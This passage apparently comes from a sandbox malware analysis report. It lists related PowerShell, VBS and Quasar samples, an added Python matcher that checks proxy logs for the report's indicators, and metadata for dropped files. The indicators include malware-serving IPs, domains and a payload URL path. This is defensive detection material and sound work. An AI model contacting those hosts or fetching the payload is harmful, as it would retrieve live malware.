| | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150 |
| | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150 |
| | fs8cRx6Us2.ps1 | malicious | Unknown | 107.161.23.150 |
| | 1AqzGcCKey.exe | malicious | Quasar | 107.161.23.150 |
| | v4BET4inNV.vbs | malicious | GuLoader | 107.161.23.150 |
                                                                                            No context
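The network tables in this report give a defender three things to hunt for: the contacted IPs 203.175.174.69 (www.bluemaxxlaser.com) and 107.161.23.150 (astenterprises.com.pk), and the payload path /ms/ms.vbs, which the report lists both as the string found inside the script (www.bluhwamaxxlashwar.com/ms/ms.vbs, sourced from gCXzb0K8Ci.ps1 itself) and under the host that the related .ps1 and .lnk samples in the context tables actually fetched it from (www.bluemaxxlaser.com). The following is an added example and not part of the Joe Sandbox report: a small Python matcher that checks web-proxy log lines against those indicators and separates strong hits (destination IP or domain) from weak, path-only hits, since the same path can be rehosted or used by unrelated sites. The log format and the log lines are constructed for illustration. bg.microsoft.map.fastly.net and the 199.232.x.172 addresses in the domain context table are a Microsoft CDN alias that the unrelated Quasar samples also contacted, so they are deliberately kept out of the indicator set.

```python
"""Match web-proxy log lines against the network indicators in this report.

Added example. The indicator values are taken from the report's IP, domain and
URL tables; the log format and the log lines below are constructed.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Indicators taken from the report's network tables.
IOC_IPS = {"203.175.174.69", "107.161.23.150"}
IOC_DOMAINS = {
    "www.bluemaxxlaser.com",      # host serving /ms/ms.vbs for the related samples
    "astenterprises.com.pk",      # second contacted host (also seen as www.)
    "www.bluhwamaxxlashwar.com",  # URL spelling found inside the .ps1 sample
}
IOC_PATHS = {"/ms/ms.vbs"}


@dataclass
class Hit:
    line: str
    reasons: set = field(default_factory=set)


def host_matches(host: str, domain: str) -> bool:
    """Exact or subdomain match, so www.astenterprises.com.pk hits astenterprises.com.pk."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def classify(url: str, dst_ip: str) -> set:
    """Return the set of indicator types a single request matches."""
    reasons = set()
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if dst_ip in IOC_IPS:
        reasons.add("ip")
    if any(host_matches(host, d) for d in IOC_DOMAINS):
        reasons.add("domain")
    # A path-only match is weak evidence: the payload can be rehosted elsewhere
    # and unrelated sites may use the same path, so it is reported separately.
    if parts.path.lower() in IOC_PATHS:
        reasons.add("path")
    return reasons


def scan(log_text: str) -> list:
    """Parse constructed 'ts client method url dst_ip status' lines; return hits."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line: skip it rather than abort the whole scan
        _ts, _client, _method, url, dst_ip, _status = fields[:6]
        reasons = classify(url, dst_ip)
        if reasons:
            hits.append(Hit(line=line, reasons=reasons))
    return hits


# Constructed proxy log (not from the report). Internal clients and the benign
# destinations use documentation address ranges; "-" marks an unresolved host.
SAMPLE_LOG = """\
2024-12-19T11:51:12Z 10.0.0.12 GET http://www.bluemaxxlaser.com/ms/ms.vbs 203.175.174.69 200
2024-12-19T11:51:13Z 10.0.0.12 GET https://www.astenterprises.com.pk/ 107.161.23.150 200
2024-12-19T11:51:14Z 10.0.0.15 GET https://www.example.com/update.cab 198.51.100.9 200
2024-12-19T11:51:15Z 10.0.0.20 GET http://www.bluhwamaxxlashwar.com/ms/ms.vbs - 503
2024-12-19T11:51:16Z 10.0.0.21 GET http://cdn.example.net/ms/ms.vbs 198.51.100.7 200
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        strength = "strong" if hit.reasons - {"path"} else "weak (path only)"
        print(f"{strength:17} {sorted(hit.reasons)}  {hit.line}")
```

The fourth constructed line shows why the script-embedded spelling is worth keeping as an indicator even though the report's Avira URL Cloud lookup rates it as safe: a client that tried that name and failed to resolve it still executed the dropper far enough to reach the download stage. In a real deployment the indicator sets would be loaded from a feed rather than hard-coded, and the domain list should be reviewed before use, since the report itself marks www.bluemaxxlaser.com and astenterprises.com.pk as non-malicious in the IP table despite their reuse across the listed samples.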
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.8307403275569238
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugL:gJjJGtpTq2yv1AuNZRY3diu8iBVqFt
                                                                                            MD5:12220A90B1668017DF626AD8A566E81B
                                                                                            SHA1:527AE50860A2667043145C1C66270687A22B980D
                                                                                            SHA-256:70F3C82B4F8CBBE0E7A3412107CCD77C60D77DD7898B71D0774E105D66B3E7CF
                                                                                            SHA-512:0ACA2DF867191C615EBC4BB15FD8B4341B9391E9B2685E649405C3CD64C261B9DCF216F96B7E533FDCD727570E8828A438D0821E5F79984370E64A74F1F183AD
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa182251f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.6586088490993207
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:ozuSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:ozuaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                            MD5:897F305A7B33F41393D1141861A4ACFA
                                                                                            SHA1:FD9D25BB497EA0E6FDDEEE9CEA370F70A4BA42C5
                                                                                            SHA-256:92C1B92E5894DB0E3ACAB0EBE3216191D631591FE0A9B024935C52C6BE90A799
                                                                                            SHA-512:4CA08FAE721ABE53A9F3A9D6B9CA3EEA0E0C12C1E8804D34531C6EE5E498D47E693D4118BF2BF4CAF7FACB52D380434445E18F6B18F39CFC3D05D0A57CFF14D4
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..%.... ...............X\...;...{......................0.z..........{...3...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................B..:.3...|.................:...3...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.08099174296970536
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:8//EYeElGkGuAJkhvekl1K58allrekGltll/SPj:8XEz2rxlG5Je3l
                                                                                            MD5:03BF00F00FBCB85AF8964EFF9B46D22F
                                                                                            SHA1:FC036E22E973B8D23EA755B6AA92518E266FBD6B
                                                                                            SHA-256:6BE52763C6F41F4948602619D494DE29A96A901D1BB5DF587940DA0EA1DB400A
                                                                                            SHA-512:4FAA0F90D615696031D3BA2D8E13E212DB7BD7824333CD2280C1E2543023CB6A2A75850E0F4857B03A7C895ADFFF68A13018B163E07CE70FBAA18300D7DF244B
                                                                                            Malicious:false
                                                                                            Preview:.........................................;...{...3...|.......{...............{.......{...XL......{..................:...3...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.2201646703014015
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXAFE+q2P92nKuAl9OmbnIFUt8OhXMFJXWZmw+OhXMFJiVkwO92nKuAl9OmbjLJ:7hV+v4HAahFUt8Oh+m/+Oh+iV5LHAaSJ
                                                                                            MD5:67C100CD83B9BFF2AEA989B2BF75CA24
                                                                                            SHA1:7314B1F9CCD94C583EBE115C44C44FFE729E4FBD
                                                                                            SHA-256:B02BB001479523B4F107028DFFCBFFDF15D09E3D5042C51E1A575BEECEFAF939
                                                                                            SHA-512:CF2FFF1CA424B116408BEB6D973E3C49391A73D49D39C883DDC1B7773FEF8636EEDF4B16391F82E43F7620911114C3BD9699E398B0A83712BA07413609BFB157
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.485 f0c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:22.489 f0c Recovering log #3.2024/12/19-06:51:22.489 f0c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.2201646703014015
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXAFE+q2P92nKuAl9OmbnIFUt8OhXMFJXWZmw+OhXMFJiVkwO92nKuAl9OmbjLJ:7hV+v4HAahFUt8Oh+m/+Oh+iV5LHAaSJ
                                                                                            MD5:67C100CD83B9BFF2AEA989B2BF75CA24
                                                                                            SHA1:7314B1F9CCD94C583EBE115C44C44FFE729E4FBD
                                                                                            SHA-256:B02BB001479523B4F107028DFFCBFFDF15D09E3D5042C51E1A575BEECEFAF939
                                                                                            SHA-512:CF2FFF1CA424B116408BEB6D973E3C49391A73D49D39C883DDC1B7773FEF8636EEDF4B16391F82E43F7620911114C3BD9699E398B0A83712BA07413609BFB157
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.485 f0c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:22.489 f0c Recovering log #3.2024/12/19-06:51:22.489 f0c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):338
                                                                                            Entropy (8bit):5.201885304424498
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXuaSN+q2P92nKuAl9Ombzo2jMGIFUt8OhX1yWZmw+OhX1RVkwO92nKuAl9OmbX:7heaSN+v4HAa8uFUt8OhgW/+OhXV5LHA
                                                                                            MD5:591853A874595A7787D4124396DF1DF6
                                                                                            SHA1:1AA3F1BBFB0CA113C7D3784B1B36D940A870D264
                                                                                            SHA-256:413C949A2F448A269FE2F1BF30B8BA74F4C212B6F3A68D36CD704E311548902F
                                                                                            SHA-512:6F6C7205E9A6C50E10AEEE0567DE94296343B5DFA2599C3F8D3D1BAA212240EA556A6F6C675075C64A1DB82497AEC1075695463C2D23FA9B8883200C011BE6AC
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.569 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:22.571 163c Recovering log #3.2024/12/19-06:51:22.571 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):338
                                                                                            Entropy (8bit):5.201885304424498
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXuaSN+q2P92nKuAl9Ombzo2jMGIFUt8OhX1yWZmw+OhX1RVkwO92nKuAl9OmbX:7heaSN+v4HAa8uFUt8OhgW/+OhXV5LHA
                                                                                            MD5:591853A874595A7787D4124396DF1DF6
                                                                                            SHA1:1AA3F1BBFB0CA113C7D3784B1B36D940A870D264
                                                                                            SHA-256:413C949A2F448A269FE2F1BF30B8BA74F4C212B6F3A68D36CD704E311548902F
                                                                                            SHA-512:6F6C7205E9A6C50E10AEEE0567DE94296343B5DFA2599C3F8D3D1BAA212240EA556A6F6C675075C64A1DB82497AEC1075695463C2D23FA9B8883200C011BE6AC
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.569 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:22.571 163c Recovering log #3.2024/12/19-06:51:22.571 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.052000810972757
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqaKsBdOg2H9CFcaq3QYiubxnP7E4TfF+:Y2sRdsxvdMHd3QYhbxP7np+
                                                                                            MD5:3598E5236604FFFDC52F400454CF37E4
                                                                                            SHA1:72D45E7F3FAC58DE865D6E68E6A6DE699988E9DB
                                                                                            SHA-256:E00F1A542748E25760A3E8B6DFE0B81C9FC04D89F56611AEA72443910907D7EC
                                                                                            SHA-512:8B544C33494BCAB7A49162184CBC3F9485535604FCE0C24C1DAA502EFB3E4D7E57B51B9239A78F742A946C5A1504E3C14ACB37BED385CB12B6E44F8F5F7FB955
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169094999958","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635259},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4099
                                                                                            Entropy (8bit):5.237884550947825
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUD0pr:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLZ
                                                                                            MD5:71A77F42522F7725F0D330F58D1711A8
                                                                                            SHA1:43DC01A7FCAAD3DEC8167521A57D193D63052FF5
                                                                                            SHA-256:A3B1891582FB1E7687920D3C1172B814A1C41296E708585E96D6CE669AC22698
                                                                                            SHA-512:D92D9FF62DF95BC9F9CF77EA9A47206424BF1C673EF65D65409260F69E0C081E41B90E3652DB163C26BC7BB2D3673CC05ED0BF695A52EB452C75704079917B2F
                                                                                            Malicious:false
                                                                                            Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):326
                                                                                            Entropy (8bit):5.217023496635218
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXX+q2P92nKuAl9OmbzNMxIFUt8OhXDyWZmw+OhXDRVkwO92nKuAl9OmbzNMFLJ:7hH+v4HAa8jFUt8OhzyW/+OhzRV5LHAo
                                                                                            MD5:A6AEC9ABEA7CBF449AD8731AD526E802
                                                                                            SHA1:6582CE8215C13B97CDA8D75A3BF891F41B5E43BC
                                                                                            SHA-256:8B37450F5BF1230628A093D45C19B69844CD8C2C261606B7369C4B882F392AAD
                                                                                            SHA-512:92EB9BCD1B023DAD5C6E98EB9F809FB19F5BE0AAEE90C39A0E75DD5014CEED2703B1A020A481F587988D778330301CA9F8AE80343FC0D4F7A3EE0FB5BBFF533D
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.733 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:22.735 163c Recovering log #3.2024/12/19-06:51:22.735 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):326
                                                                                            Entropy (8bit):5.217023496635218
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXX+q2P92nKuAl9OmbzNMxIFUt8OhXDyWZmw+OhXDRVkwO92nKuAl9OmbzNMFLJ:7hH+v4HAa8jFUt8OhzyW/+OhzRV5LHAo
                                                                                            MD5:A6AEC9ABEA7CBF449AD8731AD526E802
                                                                                            SHA1:6582CE8215C13B97CDA8D75A3BF891F41B5E43BC
                                                                                            SHA-256:8B37450F5BF1230628A093D45C19B69844CD8C2C261606B7369C4B882F392AAD
                                                                                            SHA-512:92EB9BCD1B023DAD5C6E98EB9F809FB19F5BE0AAEE90C39A0E75DD5014CEED2703B1A020A481F587988D778330301CA9F8AE80343FC0D4F7A3EE0FB5BBFF533D
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.733 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:22.735 163c Recovering log #3.2024/12/19-06:51:22.735 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):65110
                                                                                            Entropy (8bit):0.6376462682686903
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                            MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                            SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                            SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                            SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                            Malicious:false
                                                                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Certificate, Version=3
                                                                                            Category:dropped
                                                                                            Size (bytes):1391
                                                                                            Entropy (8bit):7.705940075877404
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                            Malicious:false
                                                                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):71954
                                                                                            Entropy (8bit):7.996617769952133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                            Malicious:false
                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):192
                                                                                            Entropy (8bit):2.7673182398396405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:kkFklJE06+M1fllXlE/HT8kPltNNX8RolJuRdxLlGB9lQRYwpDdt:kKR7+M2T8KNMa8RdWBwRd
                                                                                            MD5:0E851C22030F39D4EE8BFAB1BE9B6FF4
                                                                                            SHA1:8D22FCCA9B8C39113D9EEFAB9B8EDF8A47BA2C95
